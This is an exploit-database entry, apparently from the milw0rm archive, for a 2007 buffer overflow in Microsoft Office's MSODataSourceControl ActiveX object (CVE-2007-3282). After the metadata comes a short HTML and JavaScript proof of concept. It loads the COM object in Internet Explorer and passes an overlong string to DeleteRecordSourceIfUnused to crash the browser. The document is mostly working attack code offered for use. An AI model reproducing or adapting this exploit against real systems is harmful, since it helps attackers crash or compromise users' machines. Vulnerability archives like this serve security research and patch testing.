EXPLOITS

Microsoft Office - MSODataSourceControl COM-object Buffer Overflow (PoC)

Author: YAG KOHHA
type: dos
platform: windows
port: 
date_added: 2007-06-12  
date_updated:   
verified: 1  
codes: OSVDB-38471;CVE-2007-3282  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4067.html  

MSODataSourceControl.DeleteRecordSourceIfUnused COM-object B0F POC
Tested on full patched XP/SP2, IE7, MSO2003

<html>
<object id=ctl classid="clsid:{0002E55B-0000-0000-C000-000000000046}"></object>
<script language="javascript">
var b = 'AAAA';
while (b.length <= 256) b+=b;
ctl.DeleteRecordSourceIfUnused(b);
</script>
</html>

# milw0rm.com [2007-06-13]